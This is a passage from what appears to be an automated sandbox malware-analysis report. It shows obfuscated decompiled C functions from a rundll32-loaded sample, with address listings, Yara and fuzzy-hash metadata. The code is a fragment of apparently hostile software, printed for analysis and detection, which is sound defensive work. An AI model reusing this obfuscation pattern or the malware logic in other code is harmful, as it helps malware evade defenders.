						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
						goto L1;
					}
					if(_t259 != 0xe747a68) {
						goto L21;
					}
					_t259 = 0xdb1153f;
					if(_v28 > 2) {
						_t218 = E002D4346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
						_v24 = _t218;
						_pop(_t234);
						if(_t218 != 0) {
							_t259 = 0xe566670;
						}
					}
					goto L1;
					L21:
				} while (_t259 != 0xdb3b1d3);
				L22:
				return _t219;
			}










































                                                                                                                                  0x002e9eef
                                                                                                                                  0x002e9f03
                                                                                                                                  0x002e9f08
                                                                                                                                  0x002e9f0e
                                                                                                                                  0x002e9f16
                                                                                                                                  0x002e9f18
                                                                                                                                  0x002e9f20
                                                                                                                                  0x002e9f25
                                                                                                                                  0x002e9f2d
                                                                                                                                  0x002e9f36
                                                                                                                                  0x002e9f3b
                                                                                                                                  0x002e9f46
                                                                                                                                  0x002e9f49
                                                                                                                                  0x002e9f4d
                                                                                                                                  0x002e9f55
                                                                                                                                  0x002e9f5d
                                                                                                                                  0x002e9f62
                                                                                                                                  0x002e9f6a
                                                                                                                                  0x002e9f72
                                                                                                                                  0x002e9f82
                                                                                                                                  0x002e9f86
                                                                                                                                  0x002e9f8e
                                                                                                                                  0x002e9f9a
                                                                                                                                  0x002e9f9f
                                                                                                                                  0x002e9fa5
                                                                                                                                  0x002e9fad
                                                                                                                                  0x002e9fb5
                                                                                                                                  0x002e9fbd
                                                                                                                                  0x002e9fc9
                                                                                                                                  0x002e9fcc
                                                                                                                                  0x002e9fd0
                                                                                                                                  0x002e9fd8
                                                                                                                                  0x002e9fe0
                                                                                                                                  0x002e9fe8
                                                                                                                                  0x002e9ff0
                                                                                                                                  0x002e9ff8
                                                                                                                                  0x002ea005
                                                                                                                                  0x002ea009
                                                                                                                                  0x002ea011
                                                                                                                                  0x002ea019
                                                                                                                                  0x002ea022
                                                                                                                                  0x002ea026
                                                                                                                                  0x002ea02e
                                                                                                                                  0x002ea036
                                                                                                                                  0x002ea03e
                                                                                                                                  0x002ea043
                                                                                                                                  0x002ea04d
                                                                                                                                  0x002ea051
                                                                                                                                  0x002ea059
                                                                                                                                  0x002ea061
                                                                                                                                  0x002ea069
                                                                                                                                  0x002ea071
                                                                                                                                  0x002ea079
                                                                                                                                  0x002ea081
                                                                                                                                  0x002ea092
                                                                                                                                  0x002ea093
                                                                                                                                  0x002ea097
                                                                                                                                  0x002ea09c
                                                                                                                                  0x002ea0a4
                                                                                                                                  0x002ea0ac
                                                                                                                                  0x002ea0bc
                                                                                                                                  0x002ea0c0
                                                                                                                                  0x002ea0c5
                                                                                                                                  0x002ea0cd
                                                                                                                                  0x002ea0d5
                                                                                                                                  0x002ea0da
                                                                                                                                  0x002ea0e7
                                                                                                                                  0x002ea0eb
                                                                                                                                  0x002ea0f3
                                                                                                                                  0x002ea0fb
                                                                                                                                  0x002ea103
                                                                                                                                  0x002ea10b
                                                                                                                                  0x002ea119
                                                                                                                                  0x002ea11d
                                                                                                                                  0x002ea125
                                                                                                                                  0x002ea12d
                                                                                                                                  0x002ea135
                                                                                                                                  0x002ea13d
                                                                                                                                  0x002ea142
                                                                                                                                  0x002ea14a
                                                                                                                                  0x002ea14e
                                                                                                                                  0x002ea14e
                                                                                                                                  0x002ea152
                                                                                                                                  0x002ea152
                                                                                                                                  0x002ea152
                                                                                                                                  0x002ea152
                                                                                                                                  0x002ea158
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea15e
                                                                                                                                  0x002ea216
                                                                                                                                  0x002ea21c
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea21c
                                                                                                                                  0x002ea16a
                                                                                                                                  0x002ea1d5
                                                                                                                                  0x002ea1e9
                                                                                                                                  0x002ea1ee
                                                                                                                                  0x002ea1f5
                                                                                                                                  0x002ea1f9
                                                                                                                                  0x002ea1fc
                                                                                                                                  0x002ea1fd
                                                                                                                                  0x002ea202
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea202
                                                                                                                                  0x002ea172
                                                                                                                                  0x002ea1af
                                                                                                                                  0x002ea1b4
                                                                                                                                  0x002ea1b9
                                                                                                                                  0x002ea1bb
                                                                                                                                  0x002ea1c0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea1c6
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea1c6
                                                                                                                                  0x002ea17a
                                                                                                                                  0x002ea198
                                                                                                                                  0x002ea19a
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea19a
                                                                                                                                  0x002ea182
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea188
                                                                                                                                  0x002ea188
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea188
                                                                                                                                  0x002ea182
                                                                                                                                  0x002ea22c
                                                                                                                                  0x002ea2c6
                                                                                                                                  0x002ea2cd
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea2cd
                                                                                                                                  0x002ea238
                                                                                                                                  0x002ea29a
                                                                                                                                  0x002ea29f
                                                                                                                                  0x002ea2a6
                                                                                                                                  0x002ea2ae
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea2ae
                                                                                                                                  0x002ea240
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea24b
                                                                                                                                  0x002ea250
                                                                                                                                  0x002ea265
                                                                                                                                  0x002ea26a
                                                                                                                                  0x002ea26f
                                                                                                                                  0x002ea272
                                                                                                                                  0x002ea278
                                                                                                                                  0x002ea278
                                                                                                                                  0x002ea272
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea2d2
                                                                                                                                  0x002ea2d2
                                                                                                                                  0x002ea2e1
                                                                                                                                  0x002ea2e7

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: D1
                                                                                                                                  • API String ID: 0-2215811268
                                                                                                                                  • Opcode ID: 0494c1cc4ee339dd075a352cb1fb36ea237191b3039c94f30123a26d7ee2655c
                                                                                                                                  • Instruction ID: 82e55068c814e5ccd80fa1825e4c710895adf80e6ff44d22ad6524d54a32d3e9
                                                                                                                                  • Opcode Fuzzy Hash: 0494c1cc4ee339dd075a352cb1fb36ea237191b3039c94f30123a26d7ee2655c
                                                                                                                                  • Instruction Fuzzy Hash: F6A175729183418FC318CF66C48941BFBE1BBC4358F50892EF5A99B220D7B5DA598F87
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EBB23 Relevance: 1.4, Strings: 1, Instructions: 173COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E002EBB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t138;
				intOrPtr _t161;
				void* _t162;
				void* _t164;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t189;

				_t162 = __ecx;
				_push(1);
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t138);
				_v16 = 0xdfc885;
				_t189 =  &(( &_v76)[8]);
				asm("stosd");
				_t185 = 0;
				_t164 = 0xcc97672;
				asm("stosd");
				asm("stosd");
				_v32 = 0x60c2fa;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00046f58;
				_v76 = 0xb548f0;
				_v76 = _v76 >> 0xc;
				_t181 = 0xc;
				_v76 = _v76 * 0x3c;
				_v76 = _v76 + 0xffff64d0;
				_v76 = _v76 ^ 0x0001fd54;
				_v52 = 0x15927a;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000151ae;
				_v56 = 0xd6ed9;
				_t182 = 0x1a;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 + 0xfffffbb4;
				_v56 = _v56 ^ 0x0345d46e;
				_v64 = 0xba2b53;
				_v64 = _v64 * 0x6d;
				_v64 = _v64 ^ 0x73d6d9cf;
				_v64 = _v64 * 0x31;
				_v64 = _v64 ^ 0x981330b4;
				_v60 = 0x269f8;
				_v60 = _v60 >> 5;
				_v60 = _v60 + 0xffffb859;
				_v60 = _v60 ^ 0xfff00afd;
				_v68 = 0xfd9147;
				_v68 = _v68 ^ 0x8de1643f;
				_v68 = _v68 / _t182;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000df039;
				_v72 = 0x5def36;
				_v72 = _v72 | 0xd620e1c7;
				_v72 = _v72 + 0xd307;
				_t183 = 0x48;
				_v72 = _v72 / _t183;
				_v72 = _v72 ^ 0x02f0e4dc;
				_v24 = 0xf7704c;
				_v24 = _v24 + 0x27dd;
				_v24 = _v24 ^ 0x00ff74b2;
				_v28 = 0x151ed9;
				_v28 = _v28 * 0x48;
				_v28 = _v28 ^ 0x05f046e2;
				_v36 = 0xddc4df;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 | 0x7f83127d;
				_v36 = _v36 ^ 0x7f8e5ab1;
				_v40 = 0x29fd7f;
				_v40 = _v40 >> 7;
				_v40 = _v40 | 0x8d3b2756;
				_v40 = _v40 ^ 0x8d37b79a;
				_v44 = 0x8dc5a8;
				_v44 = _v44 * 0x63;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x036b3557;
				_v48 = 0xd61f7e;
				_v48 = _v48 | 0xd43d52c3;
				_v48 = _v48 + 0xa376;
				_v48 = _v48 ^ 0xd504b7b0;
				_t184 = _v20;
				while(_t164 != 0x2524be6) {
					if(_t164 == 0xcc97672) {
						_t164 = 0xe41debb;
						continue;
					} else {
						if(_t164 == 0xdd773d9) {
							if(E002ED8EC(_v52, _v56,  &_v20, _t184) != 0) {
								_t164 = 0xe01b1ec;
								continue;
							}
						} else {
							if(_t164 == 0xe01b1ec) {
								E002F0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
								_t189 =  &(_t189[0xa]);
								_t164 = 0x2524be6;
								_t185 =  !=  ? 1 : _t185;
								continue;
							} else {
								if(_t164 != 0xe41debb) {
									L13:
									if(_t164 != 0x78a313b) {
										continue;
									}
								} else {
									_t161 = E002D3DE2(_t164);
									_t184 = _t161;
									if(_t161 != 0xffffffff) {
										_t164 = 0xdd773d9;
										continue;
									}
								}
							}
						}
					}
					return _t185;
				}
				E002E1E67(_v36, _v40, _v44, _v48, _v20);
				_t189 =  &(_t189[3]);
				_t164 = 0x78a313b;
				goto L13;
			}





























                                                                                                                                  0x002ebb2c
                                                                                                                                  0x002ebb2f
                                                                                                                                  0x002ebb30
                                                                                                                                  0x002ebb31
                                                                                                                                  0x002ebb35
                                                                                                                                  0x002ebb39
                                                                                                                                  0x002ebb3d
                                                                                                                                  0x002ebb41
                                                                                                                                  0x002ebb42
                                                                                                                                  0x002ebb43
                                                                                                                                  0x002ebb48
                                                                                                                                  0x002ebb56
                                                                                                                                  0x002ebb59
                                                                                                                                  0x002ebb5c
                                                                                                                                  0x002ebb5e
                                                                                                                                  0x002ebb65
                                                                                                                                  0x002ebb66
                                                                                                                                  0x002ebb67
                                                                                                                                  0x002ebb6f
                                                                                                                                  0x002ebb74
                                                                                                                                  0x002ebb7c
                                                                                                                                  0x002ebb84
                                                                                                                                  0x002ebb8e
                                                                                                                                  0x002ebb91
                                                                                                                                  0x002ebb95
                                                                                                                                  0x002ebb9d
                                                                                                                                  0x002ebba5
                                                                                                                                  0x002ebbbd
                                                                                                                                  0x002ebbc1
                                                                                                                                  0x002ebbc9
                                                                                                                                  0x002ebbd6
                                                                                                                                  0x002ebbd9
                                                                                                                                  0x002ebbdd
                                                                                                                                  0x002ebbe5
                                                                                                                                  0x002ebbed
                                                                                                                                  0x002ebbfa
                                                                                                                                  0x002ebbfe
                                                                                                                                  0x002ebc0b
                                                                                                                                  0x002ebc0f
                                                                                                                                  0x002ebc17
                                                                                                                                  0x002ebc1f
                                                                                                                                  0x002ebc24
                                                                                                                                  0x002ebc2c
                                                                                                                                  0x002ebc34
                                                                                                                                  0x002ebc3c
                                                                                                                                  0x002ebc4c
                                                                                                                                  0x002ebc50
                                                                                                                                  0x002ebc55
                                                                                                                                  0x002ebc5d
                                                                                                                                  0x002ebc65
                                                                                                                                  0x002ebc6d
                                                                                                                                  0x002ebc79
                                                                                                                                  0x002ebc7c
                                                                                                                                  0x002ebc80
                                                                                                                                  0x002ebc88
                                                                                                                                  0x002ebc90
                                                                                                                                  0x002ebc98
                                                                                                                                  0x002ebca0
                                                                                                                                  0x002ebcad
                                                                                                                                  0x002ebcb1
                                                                                                                                  0x002ebcb9
                                                                                                                                  0x002ebcc1
                                                                                                                                  0x002ebcc6
                                                                                                                                  0x002ebcce
                                                                                                                                  0x002ebcd6
                                                                                                                                  0x002ebcde
                                                                                                                                  0x002ebce3
                                                                                                                                  0x002ebceb
                                                                                                                                  0x002ebcf3
                                                                                                                                  0x002ebd00
                                                                                                                                  0x002ebd04
                                                                                                                                  0x002ebd09
                                                                                                                                  0x002ebd11
                                                                                                                                  0x002ebd19
                                                                                                                                  0x002ebd21
                                                                                                                                  0x002ebd29
                                                                                                                                  0x002ebd31
                                                                                                                                  0x002ebd35
                                                                                                                                  0x002ebd47
                                                                                                                                  0x002ebde6
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebd4d
                                                                                                                                  0x002ebd53
                                                                                                                                  0x002ebdda
                                                                                                                                  0x002ebddc
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebddc
                                                                                                                                  0x002ebd55
                                                                                                                                  0x002ebd5b
                                                                                                                                  0x002ebdac
                                                                                                                                  0x002ebdb1
                                                                                                                                  0x002ebdb4
                                                                                                                                  0x002ebdbb
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebd5d
                                                                                                                                  0x002ebd63
                                                                                                                                  0x002ebe11
                                                                                                                                  0x002ebe17
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebd69
                                                                                                                                  0x002ebd71
                                                                                                                                  0x002ebd76
                                                                                                                                  0x002ebd7b
                                                                                                                                  0x002ebd81
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebd81
                                                                                                                                  0x002ebd7b
                                                                                                                                  0x002ebd63
                                                                                                                                  0x002ebd5b
                                                                                                                                  0x002ebd53
                                                                                                                                  0x002ebe26
                                                                                                                                  0x002ebe26
                                                                                                                                  0x002ebe04
                                                                                                                                  0x002ebe09
                                                                                                                                  0x002ebe0c
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 6]
                                                                                                                                  • API String ID: 0-3974934468
                                                                                                                                  • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                  • Instruction ID: fce4437c71cfe40829089c5ffe78e0d55e20901c671b965ee0a1da3d260f6e68
                                                                                                                                  • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                                  • Instruction Fuzzy Hash: F0713171108381AFC359CF26C88941BBBE5FFC9758F904A1DF69696260C372CA598F43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D5361 Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E002D5361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* __edx;
				void* _t84;
				void* _t104;
				void* _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t124;
				signed int* _t127;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002E20B9(_t84);
				_v4 = 0x18047d;
				_t127 =  &(( &_v32)[5]);
				_v4 = _v4 >> 0xa;
				_v4 = _v4 ^ 0x000d3248;
				_t124 = 0;
				_v28 = 0x90acd4;
				_t104 = 0x35df4ed;
				_v28 = _v28 >> 5;
				_v28 = _v28 + 0xffff3107;
				_v28 = _v28 | 0xd0f9b279;
				_v28 = _v28 ^ 0xd0f1daef;
				_v8 = 0x9d14b7;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x027823b1;
				_v32 = 0xfd6947;
				_v32 = _v32 + 0xffff03bf;
				_t120 = 0x72;
				_v32 = _v32 / _t120;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00066e44;
				_v16 = 0x111da;
				_v16 = _v16 ^ 0xdd7c73d4;
				_v16 = _v16 | 0x7d37165e;
				_v16 = _v16 ^ 0xfd769a76;
				_v12 = 0x2531de;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xa63e9142;
				_v20 = 0x6e0002;
				_v20 = _v20 >> 0xe;
				_t121 = 0xe;
				_v20 = _v20 / _t121;
				_t122 = 0x3d;
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x000bef19;
				_v24 = 0xa3fc95;
				_v24 = _v24 + 0xdcd1;
				_v24 = _v24 << 3;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x0013a2ec;
				while(_t104 != 0x311781) {
					if(_t104 == 0x35df4ed) {
						_push(_t104);
						_push(_t104);
						_t118 = 0x28;
						 *0x2f3e08 = E002D7FF2(_t118);
						_t104 = 0x605992c;
						continue;
					} else {
						if(_t104 == 0x477ef52) {
							E002D924B();
							_t104 = 0x311781;
							continue;
						} else {
							if(_t104 == 0x605992c) {
								if(E002F0F33() != 0) {
									_t104 = 0xdb1ba22;
									continue;
								}
							} else {
								if(_t104 != 0xdb1ba22) {
									L13:
									if(_t104 != 0x5723dc8) {
										continue;
									}
								} else {
									_t124 = E002D960D(_v16, _a12, _a8, _v12);
									_t127 =  &(_t127[3]);
									if(_t124 == 0) {
										_t104 = 0x477ef52;
										continue;
									}
								}
							}
						}
					}
					return _t124;
				}
				E002E8519(_v20, _v24,  *0x2f3e08);
				_t104 = 0x5723dc8;
				goto L13;
			}




















                                                                                                                                  0x002d5368
                                                                                                                                  0x002d536c
                                                                                                                                  0x002d5370
                                                                                                                                  0x002d5376
                                                                                                                                  0x002d537b
                                                                                                                                  0x002d5383
                                                                                                                                  0x002d5386
                                                                                                                                  0x002d538d
                                                                                                                                  0x002d5395
                                                                                                                                  0x002d5397
                                                                                                                                  0x002d539f
                                                                                                                                  0x002d53a4
                                                                                                                                  0x002d53ae
                                                                                                                                  0x002d53bb
                                                                                                                                  0x002d53c3
                                                                                                                                  0x002d53cb
                                                                                                                                  0x002d53d3
                                                                                                                                  0x002d53d8
                                                                                                                                  0x002d53e0
                                                                                                                                  0x002d53e8
                                                                                                                                  0x002d53f6
                                                                                                                                  0x002d53fb
                                                                                                                                  0x002d5401
                                                                                                                                  0x002d5406
                                                                                                                                  0x002d540e
                                                                                                                                  0x002d5416
                                                                                                                                  0x002d541e
                                                                                                                                  0x002d5426
                                                                                                                                  0x002d542e
                                                                                                                                  0x002d5436
                                                                                                                                  0x002d543b
                                                                                                                                  0x002d5443
                                                                                                                                  0x002d544b
                                                                                                                                  0x002d5454
                                                                                                                                  0x002d5459
                                                                                                                                  0x002d5464
                                                                                                                                  0x002d5465
                                                                                                                                  0x002d5469
                                                                                                                                  0x002d5471
                                                                                                                                  0x002d5479
                                                                                                                                  0x002d5481
                                                                                                                                  0x002d5491
                                                                                                                                  0x002d5495
                                                                                                                                  0x002d549d
                                                                                                                                  0x002d54a7
                                                                                                                                  0x002d5501
                                                                                                                                  0x002d5502
                                                                                                                                  0x002d5505
                                                                                                                                  0x002d550d
                                                                                                                                  0x002d5512
                                                                                                                                  0x00000000
                                                                                                                                  0x002d54a9
                                                                                                                                  0x002d54ab
                                                                                                                                  0x002d54ec
                                                                                                                                  0x002d54f1
                                                                                                                                  0x00000000
                                                                                                                                  0x002d54ad
                                                                                                                                  0x002d54b3
                                                                                                                                  0x002d54e6
                                                                                                                                  0x002d54e8
                                                                                                                                  0x00000000
                                                                                                                                  0x002d54e8
                                                                                                                                  0x002d54b5
                                                                                                                                  0x002d54b7
                                                                                                                                  0x002d5532
                                                                                                                                  0x002d5538
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d54b9
                                                                                                                                  0x002d54d2
                                                                                                                                  0x002d54d4
                                                                                                                                  0x002d54d9
                                                                                                                                  0x002d54db
                                                                                                                                  0x00000000
                                                                                                                                  0x002d54db
                                                                                                                                  0x002d54d9
                                                                                                                                  0x002d54b7
                                                                                                                                  0x002d54b3
                                                                                                                                  0x002d54ab
                                                                                                                                  0x002d5547
                                                                                                                                  0x002d5547
                                                                                                                                  0x002d5527
                                                                                                                                  0x002d552d
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H2
                                                                                                                                  • API String ID: 0-302591398
                                                                                                                                  • Opcode ID: 321bcaebf0829c08e6ffc011ee7743f6d811d8785861cfafe42f24c322733d5f
                                                                                                                                  • Instruction ID: 79fdd19cba95412be890e5590b0c82a077c24523a7766a98fb55c321d166861b
                                                                                                                                  • Opcode Fuzzy Hash: 321bcaebf0829c08e6ffc011ee7743f6d811d8785861cfafe42f24c322733d5f
                                                                                                                                  • Instruction Fuzzy Hash: E64178726183019BC728CF25E44A42FBBE1FBD8758F144A1EF58656260D7B4CE98CB93
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D8B3D Relevance: 1.4, Strings: 1, Instructions: 109COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002D8B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t83;
				void* _t89;
				signed int _t93;
				void* _t96;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;

				_push(_a16);
				_t108 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t83);
				_v72 = 0xbb1237;
				_t112 = _t111 + 0x18;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xd544;
				_t109 = 0;
				_v72 = _v72 ^ 0x000eb3e9;
				_t96 = 0x815a082;
				_v48 = 0x50cb35;
				_v48 = _v48 + 0xffff87ec;
				_v48 = _v48 ^ 0x00585237;
				_v52 = 0xa4cd83;
				_v52 = _v52 ^ 0x5b114d95;
				_v52 = _v52 ^ 0x5bb6524d;
				_v56 = 0xbe8ecf;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xa3b0842f;
				_v60 = 0x771210;
				_v60 = _v60 | 0x3e44f288;
				_v60 = _v60 ^ 0x3e758d5b;
				_v80 = 0xf3b10d;
				_v80 = _v80 ^ 0x3cb59f0c;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xffffd90b;
				_v80 = _v80 ^ 0x03c55d5e;
				_v64 = 0x352515;
				_v64 = _v64 ^ 0x7339bda5;
				_v64 = _v64 + 0x1326;
				_v64 = _v64 ^ 0x7306d08c;
				_v68 = 0x4f62f3;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x83faab25;
				_v68 = _v68 ^ 0x6fa8977d;
				_v76 = 0x2ac691;
				_v76 = _v76 << 9;
				_t93 = 0x6b;
				_v76 = _v76 / _t93;
				_v76 = _v76 << 0xc;
				_v76 = _v76 ^ 0xcae566b9;
				do {
					while(_t96 != 0x54856a9) {
						if(_t96 == 0x815a082) {
							_t96 = 0x54856a9;
							continue;
						} else {
							if(_t96 == 0xa9da54a) {
								_t89 = E002ED97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
								_t112 = _t112 + 0xc;
								__eflags = _t89;
								if(__eflags != 0) {
									_t96 = 0xefea9c1;
									continue;
								}
							} else {
								_t118 = _t96 - 0xefea9c1;
								if(_t96 != 0xefea9c1) {
									goto L11;
								} else {
									E002ED97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E002D3DBC( &_v44, _a8, _v72, _v48, _v52);
					_t112 = _t112 + 0xc;
					_t96 = 0xa9da54a;
					L11:
					__eflags = _t96 - 0x309e957;
				} while (__eflags != 0);
				goto L6;
			}





















                                                                                                                                  0x002d8b44
                                                                                                                                  0x002d8b48
                                                                                                                                  0x002d8b4a
                                                                                                                                  0x002d8b4e
                                                                                                                                  0x002d8b52
                                                                                                                                  0x002d8b56
                                                                                                                                  0x002d8b57
                                                                                                                                  0x002d8b58
                                                                                                                                  0x002d8b5d
                                                                                                                                  0x002d8b65
                                                                                                                                  0x002d8b68
                                                                                                                                  0x002d8b6f
                                                                                                                                  0x002d8b77
                                                                                                                                  0x002d8b79
                                                                                                                                  0x002d8b81
                                                                                                                                  0x002d8b86
                                                                                                                                  0x002d8b93
                                                                                                                                  0x002d8b9b
                                                                                                                                  0x002d8ba3
                                                                                                                                  0x002d8bab
                                                                                                                                  0x002d8bb3
                                                                                                                                  0x002d8bbb
                                                                                                                                  0x002d8bc3
                                                                                                                                  0x002d8bc8
                                                                                                                                  0x002d8bd0
                                                                                                                                  0x002d8bd8
                                                                                                                                  0x002d8be0
                                                                                                                                  0x002d8be8
                                                                                                                                  0x002d8bf0
                                                                                                                                  0x002d8bf8
                                                                                                                                  0x002d8bfd
                                                                                                                                  0x002d8c05
                                                                                                                                  0x002d8c0d
                                                                                                                                  0x002d8c15
                                                                                                                                  0x002d8c1d
                                                                                                                                  0x002d8c25
                                                                                                                                  0x002d8c2d
                                                                                                                                  0x002d8c35
                                                                                                                                  0x002d8c3a
                                                                                                                                  0x002d8c42
                                                                                                                                  0x002d8c4a
                                                                                                                                  0x002d8c52
                                                                                                                                  0x002d8c5d
                                                                                                                                  0x002d8c65
                                                                                                                                  0x002d8c69
                                                                                                                                  0x002d8c6e
                                                                                                                                  0x002d8c76
                                                                                                                                  0x002d8c76
                                                                                                                                  0x002d8c80
                                                                                                                                  0x002d8ce0
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8c82
                                                                                                                                  0x002d8c88
                                                                                                                                  0x002d8cd0
                                                                                                                                  0x002d8cd5
                                                                                                                                  0x002d8cd8
                                                                                                                                  0x002d8cda
                                                                                                                                  0x002d8cdc
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8cdc
                                                                                                                                  0x002d8c8a
                                                                                                                                  0x002d8c8a
                                                                                                                                  0x002d8c8c
                                                                                                                                  0x00000000
                                                                                                                                  0x002d8c8e
                                                                                                                                  0x002d8ca2
                                                                                                                                  0x002d8caf
                                                                                                                                  0x002d8caf
                                                                                                                                  0x002d8c8c
                                                                                                                                  0x002d8c88
                                                                                                                                  0x002d8cb3
                                                                                                                                  0x002d8cbb
                                                                                                                                  0x002d8cbb
                                                                                                                                  0x002d8cf8
                                                                                                                                  0x002d8cfd
                                                                                                                                  0x002d8d00
                                                                                                                                  0x002d8d05
                                                                                                                                  0x002d8d05
                                                                                                                                  0x002d8d05
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
